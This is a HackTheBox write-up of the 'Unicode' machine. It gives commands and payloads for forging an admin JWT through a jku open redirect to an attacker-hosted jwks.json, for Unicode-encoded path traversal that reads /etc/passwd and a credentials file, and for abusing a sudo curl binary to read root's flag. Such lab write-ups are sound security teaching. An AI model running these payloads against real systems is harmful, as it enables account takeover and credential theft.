Unicode — HackTheBox Machine WriteUp

This post is focused on the walkthrough of Medium level machine Unicode of Hackthebox.

Enumeration

Starting out with the initial nmap scan

nmap -A -vv 10.10.11.126

We have ports 22 and 80 open. So let’s enumerate port 80 now.

We have a webpage named Hackmedia.

Enumerating further we have a login page.

I tried SQL Injection but didn’t work so I registered an account and logged in using that to test the functionality.

We have a user dashboard. Next we can check the upload file functionality.

After testing this feature I couldn’t bypass it so I moved on to test some other things.

Gaining Access

Looking at the cookie we have a JWT Token.

Looking at the decoded token, there are a few things we can tweak to login as admin and escalate further.

I’ll be adding hackmedia.htb to the /etc/hosts file

echo “10.10.11.126 hackmedia.htb” | sudo tee -a /etc/hosts

Visiting the link above we have the following page.

Now here’s what we’ll be doing. First we’ll create another JWT key and replace the values in the above jwks.json file. Then we’ll link our own tweaked jwks.json file with the original JWT token.

The following command will generate a key pair

openssl genrsa -out key.pem 2048

The following python script will take our key pair file and print out the values we need to change in jwks.json file.

from jwcrypto import jwk, jwt

with open(‘key.pem’, ‘rb’) as pem:
key = jwk.JWK.from_pem(pem.read())

print(f’{key}’)
print(f’n: {key.n}’)

We’ll replace the ’n’ and ‘kid’ value in the jwks.json file.

Now our jwks.json file is as follows

We’ll start a python http server to fetch our tweaked jwks.json file.

python3 -m http.server 80

The following script will regenerate the jwt token replacing the jwks.json file and change the value of user to admin.

from jwcrypto import jwk, jwt

with open(‘key.pem’, ‘rb’) as pem:
key = jwk.JWK.from_pem(pem.read())

my_token = jwt.JWT(header={‘alg’:’RS256', ‘jku’:’http://hackmedia.htb/static/../redirect/?url=10.10.14.160/jwks.json'}, claims={‘user’:’admin’})
my_token.make_signed_token(key)
print(my_token.serialize())

Now looking at our token we have

Now we’ll replace our original token with the above token

Boom! we are logged in to the admin dashboard.

Now after testing for a while I came across that Current Month page could be vulnerable to LFI.

Accessing the following url we get

hackmedia.htb/display/?page=../../etc/passwd

Looking at the error message here we can assume there must be some sort of filtering. After looking around and trial & error, I bypassed the filtering and read the /etc/passwd file

http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd

We can see that we have a user named code.

From the initial nmap scan we know that the server is running on nginx so we can try to read the default nginx config file.

http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/nginx/sites-available/default

We can see that we have a db.yaml file and that could contain some valid credentials. Looking around for that file I found the file in the following path.

http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/coder/db.yaml

Boom! we have some creds. Let’s try these out in ssh.

ssh code@hackmedia.htb

And we’re in.

user.txt

Reading the user.txt file

Privilege Escalation

sudo -l

Running the above command we can see that our user can run /usr/bin/treport file as root.

Let’s run this file first to test the functionality

Testing out the functionality, I noticed that the binary has four options. The most important ones are 2 & 3. With option 3 we can download a file with an IP or file name and with option 2 we can read that file. Also the binary is using curl command to fetch the files.

root.txt

Since we can download the file through an IP or a file name, I downloaded the root.txt file and read it.

Thanks for reading!